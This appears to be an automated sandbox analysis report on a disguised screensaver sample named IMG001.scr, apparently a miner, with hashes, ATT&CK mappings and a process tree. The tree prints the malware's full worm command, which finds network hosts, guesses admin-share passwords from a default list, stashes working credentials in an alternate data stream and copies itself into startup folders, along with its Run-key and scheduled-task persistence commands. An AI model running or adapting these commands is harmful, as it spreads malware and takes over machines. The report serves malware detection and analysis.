b914abc696286a639a847d2e3a4a36ff682f30a87b08c4ffc61f2e0cf5e7ec5f

Resubmissions

04-08-2023 08:19

230804-j7vf6aab52 7

25-05-2021 14:04

210525-pym71tsy36 8

Analysis

max time kernel
149s
max time network
144s
platform
windows7_x64
resource
win7v20210410
submitted
25-05-2021 14:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

IMG001.scr
Size

3.4MB
MD5

fbbcf1e9501234d6661a0c9ae6dc01c9
SHA1

1ca9759a324159f331e79ea6871ad62040521b41
SHA256

d9901b16a93aad709947524379d572a7a7bf8e2741e27a1112c95977d4a6ea8c
SHA512

027e5ea6d92955b87439f61704de5b3e21c7a8e0a95327868951968e4f5cbed59cf1e803ac9adb2c9cf577db7a2f6fd4383b7384d57a78596cfb2ff020907140

Score

8^/10

persistence

Malware Config

Signatures

Executes dropped EXE 1 IoCs

Processes:

IMG001.exe

pid process

316 IMG001.exe
Drops startup file 1 IoCs

Processes:

IMG001.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk IMG001.exe
Loads dropped DLL 7 IoCs

Processes:

IMG001.scrIMG001.exe

pid process

1756 IMG001.scr
316 IMG001.exe
316 IMG001.exe
316 IMG001.exe
316 IMG001.exe
316 IMG001.exe
316 IMG001.exe

pid	process
316	IMG001.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk	IMG001.exe

pid	process
1756	IMG001.scr
316	IMG001.exe
316	IMG001.exe
316	IMG001.exe
316	IMG001.exe
316	IMG001.exe
316	IMG001.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

IMG001.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run	IMG001.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe"	IMG001.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe"	reg.exe

Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

IMG001.exe

description ioc process

File opened (read-only) \??\E: IMG001.exe
Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\UAC.job schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File opened (read-only)	\??\E:	IMG001.exe

description	ioc	process
File created	C:\Windows\Tasks\UAC.job	schtasks.exe

NSIS installer 8 IoCs

installer

Processes:

resource	yara_rule
\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe	nsis_installer_1
\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe	nsis_installer_2
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe	nsis_installer_1
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe	nsis_installer_2
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe	nsis_installer_1
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe	nsis_installer_2
\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe	nsis_installer_1
\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe	nsis_installer_2

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

308 schtasks.exe
1212 schtasks.exe
Discovers systems in the same network 1 TTPs 2 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exenet.exe

pid process

1380 net.exe
1660 net.exe

pid	process
308	schtasks.exe
1212	schtasks.exe

pid	process
1380	net.exe
1660	net.exe

Enumerates system info in registry 2 TTPs 12 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

xcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

NTFS ADS 2 IoCs

Processes:

cmd.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P	cmd.exe

Runs net.exe
Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

1980 PING.EXE
1844 PING.EXE
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powercfg.exepowercfg.exepowercfg.exe

description pid process

Token: SeShutdownPrivilege 1216 powercfg.exe
Token: SeShutdownPrivilege 300 powercfg.exe
Token: SeShutdownPrivilege 1320 powercfg.exe

pid	process
1980	PING.EXE
1844	PING.EXE

description	pid	process
Token: SeShutdownPrivilege	1216	powercfg.exe
Token: SeShutdownPrivilege	300	powercfg.exe
Token: SeShutdownPrivilege	1320	powercfg.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

IMG001.scrIMG001.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1756 wrote to memory of 316	1756	IMG001.scr	IMG001.exe
PID 1756 wrote to memory of 316	1756	IMG001.scr	IMG001.exe
PID 1756 wrote to memory of 316	1756	IMG001.scr	IMG001.exe
PID 1756 wrote to memory of 316	1756	IMG001.scr	IMG001.exe
PID 316 wrote to memory of 904	316	IMG001.exe	cmd.exe
PID 316 wrote to memory of 904	316	IMG001.exe	cmd.exe
PID 316 wrote to memory of 904	316	IMG001.exe	cmd.exe
PID 316 wrote to memory of 904	316	IMG001.exe	cmd.exe
PID 316 wrote to memory of 368	316	IMG001.exe	cmd.exe
PID 316 wrote to memory of 368	316	IMG001.exe	cmd.exe
PID 316 wrote to memory of 368	316	IMG001.exe	cmd.exe
PID 316 wrote to memory of 368	316	IMG001.exe	cmd.exe
PID 316 wrote to memory of 1512	316	IMG001.exe	cmd.exe
PID 316 wrote to memory of 1512	316	IMG001.exe	cmd.exe
PID 316 wrote to memory of 1512	316	IMG001.exe	cmd.exe
PID 316 wrote to memory of 1512	316	IMG001.exe	cmd.exe
PID 316 wrote to memory of 812	316	IMG001.exe	cmd.exe
PID 316 wrote to memory of 812	316	IMG001.exe	cmd.exe
PID 316 wrote to memory of 812	316	IMG001.exe	cmd.exe
PID 316 wrote to memory of 812	316	IMG001.exe	cmd.exe
PID 904 wrote to memory of 1768	904	cmd.exe	reg.exe
PID 904 wrote to memory of 1768	904	cmd.exe	reg.exe
PID 904 wrote to memory of 1768	904	cmd.exe	reg.exe
PID 904 wrote to memory of 1768	904	cmd.exe	reg.exe
PID 368 wrote to memory of 1212	368	cmd.exe	schtasks.exe
PID 368 wrote to memory of 1212	368	cmd.exe	schtasks.exe
PID 368 wrote to memory of 1212	368	cmd.exe	schtasks.exe
PID 368 wrote to memory of 1212	368	cmd.exe	schtasks.exe
PID 1512 wrote to memory of 308	1512	cmd.exe	schtasks.exe
PID 1512 wrote to memory of 308	1512	cmd.exe	schtasks.exe
PID 1512 wrote to memory of 308	1512	cmd.exe	schtasks.exe
PID 1512 wrote to memory of 308	1512	cmd.exe	schtasks.exe
PID 812 wrote to memory of 1216	812	cmd.exe	powercfg.exe
PID 812 wrote to memory of 1216	812	cmd.exe	powercfg.exe
PID 812 wrote to memory of 1216	812	cmd.exe	powercfg.exe
PID 812 wrote to memory of 1216	812	cmd.exe	powercfg.exe
PID 812 wrote to memory of 300	812	cmd.exe	powercfg.exe
PID 812 wrote to memory of 300	812	cmd.exe	powercfg.exe
PID 812 wrote to memory of 300	812	cmd.exe	powercfg.exe
PID 812 wrote to memory of 300	812	cmd.exe	powercfg.exe
PID 812 wrote to memory of 1320	812	cmd.exe	powercfg.exe
PID 812 wrote to memory of 1320	812	cmd.exe	powercfg.exe
PID 812 wrote to memory of 1320	812	cmd.exe	powercfg.exe
PID 812 wrote to memory of 1320	812	cmd.exe	powercfg.exe
PID 316 wrote to memory of 436	316	IMG001.exe	cmd.exe
PID 316 wrote to memory of 436	316	IMG001.exe	cmd.exe
PID 316 wrote to memory of 436	316	IMG001.exe	cmd.exe
PID 316 wrote to memory of 436	316	IMG001.exe	cmd.exe
PID 436 wrote to memory of 752	436	cmd.exe	cmd.exe
PID 436 wrote to memory of 752	436	cmd.exe	cmd.exe
PID 436 wrote to memory of 752	436	cmd.exe	cmd.exe
PID 436 wrote to memory of 752	436	cmd.exe	cmd.exe
PID 752 wrote to memory of 1380	752	cmd.exe	net.exe
PID 752 wrote to memory of 1380	752	cmd.exe	net.exe
PID 752 wrote to memory of 1380	752	cmd.exe	net.exe
PID 752 wrote to memory of 1380	752	cmd.exe	net.exe
PID 752 wrote to memory of 592	752	cmd.exe	find.exe
PID 752 wrote to memory of 592	752	cmd.exe	find.exe
PID 752 wrote to memory of 592	752	cmd.exe	find.exe
PID 752 wrote to memory of 592	752	cmd.exe	find.exe
PID 752 wrote to memory of 2008	752	cmd.exe	ARP.EXE
PID 752 wrote to memory of 2008	752	cmd.exe	ARP.EXE
PID 752 wrote to memory of 2008	752	cmd.exe	ARP.EXE
PID 752 wrote to memory of 2008	752	cmd.exe	ARP.EXE

C:\Users\Admin\AppData\Local\Temp\IMG001.scr
"C:\Users\Admin\AppData\Local\Temp\IMG001.scr" /S
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1756

C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
2⤵
- Executes dropped EXE
- Drops startup file
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:316

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
3⤵
- Suspicious use of WriteProcessMemory
PID:904

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
4⤵
- Adds Run key to start application
PID:1768

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:368

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
4⤵
- Creates scheduled task(s)
PID:1212

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1512

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:308

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
3⤵
- Suspicious use of WriteProcessMemory
PID:812

C:\Windows\SysWOW64\powercfg.exe
powercfg /CHANGE -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1216

C:\Windows\SysWOW64\powercfg.exe
powercfg /CHANGE -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:300

C:\Windows\SysWOW64\powercfg.exe
Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1320

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=1702& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))
3⤵
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"
4⤵
- Suspicious use of WriteProcessMemory
PID:752

C:\Windows\SysWOW64\net.exe
net view
5⤵
- Discovers systems in the same network
PID:1380

C:\Windows\SysWOW64\find.exe
find /i "\\"
5⤵
PID:592

C:\Windows\SysWOW64\ARP.EXE
arp -a
5⤵
PID:2008

C:\Windows\SysWOW64\find.exe
find /i " 1"
5⤵
PID:2036

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c set str_
4⤵
PID:2032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net view \\10.7.0.255|find /i " "
4⤵
PID:1156

C:\Windows\SysWOW64\net.exe
net view \\10.7.0.255
5⤵
- Discovers systems in the same network
PID:1660

C:\Windows\SysWOW64\find.exe
find /i " "
5⤵
PID:872

C:\Windows\SysWOW64\net.exe
net use * /delete /y
4⤵
PID:1808

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
4⤵
- Runs ping.exe
PID:1980

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
4⤵
PID:1368

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
4⤵
PID:1336

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
5⤵
- Enumerates system info in registry
PID:1068

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
4⤵
PID:1372

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
4⤵
PID:1824

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
5⤵
- Enumerates system info in registry
PID:1364

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
4⤵
PID:1620

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
4⤵
PID:1852

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
5⤵
- Enumerates system info in registry
PID:916

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
4⤵
PID:1764

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
4⤵
PID:608

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
5⤵
- Enumerates system info in registry
PID:1532

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
4⤵
PID:888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
4⤵
PID:1112

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
5⤵
- Enumerates system info in registry
PID:1324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
4⤵
PID:1096

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "
4⤵
PID:1684

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"
5⤵
- Enumerates system info in registry
PID:1076

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
4⤵
PID:664

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "
4⤵
PID:820

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"
5⤵
- Enumerates system info in registry
PID:1524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
4⤵
PID:1648

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
4⤵
PID:1432

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
5⤵
- Enumerates system info in registry
PID:1964

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
4⤵
PID:1380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
4⤵
PID:1160

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
5⤵
- Enumerates system info in registry
PID:1672

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
4⤵
PID:2036

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "
4⤵
PID:2012

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"
5⤵
- Enumerates system info in registry
PID:1052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
4⤵
PID:1840

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "
4⤵
PID:868

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"
5⤵
- Enumerates system info in registry
PID:1156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
4⤵
PID:1644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\1\IMG001.exe" 1>nul && @ echo copy to "\\10.7.0.255\C$\1\IMG001.exe" "
4⤵
PID:1808

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.7.0.255\C$\1\IMG001.exe"
5⤵
- Enumerates system info in registry
PID:1552

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ /delete /y
4⤵
PID:1960

C:\Windows\SysWOW64\PING.EXE
ping -n 20 localhost
4⤵
- Runs ping.exe
PID:1844

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe

MD5
fbbcf1e9501234d6661a0c9ae6dc01c9

SHA1
1ca9759a324159f331e79ea6871ad62040521b41

SHA256
d9901b16a93aad709947524379d572a7a7bf8e2741e27a1112c95977d4a6ea8c

SHA512
027e5ea6d92955b87439f61704de5b3e21c7a8e0a95327868951968e4f5cbed59cf1e803ac9adb2c9cf577db7a2f6fd4383b7384d57a78596cfb2ff020907140

Download Submit
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe

MD5
fbbcf1e9501234d6661a0c9ae6dc01c9

SHA1
1ca9759a324159f331e79ea6871ad62040521b41

SHA256
d9901b16a93aad709947524379d572a7a7bf8e2741e27a1112c95977d4a6ea8c

SHA512
027e5ea6d92955b87439f61704de5b3e21c7a8e0a95327868951968e4f5cbed59cf1e803ac9adb2c9cf577db7a2f6fd4383b7384d57a78596cfb2ff020907140

Download Submit
\Users\Admin\AppData\Local\Temp\nsd2751.tmp\inetc.dll

MD5
d7a3fa6a6c738b4a3c40d5602af20b08

SHA1
34fc75d97f640609cb6cadb001da2cb2c0b3538a

SHA256
67eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e

SHA512
75cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934

Download Submit
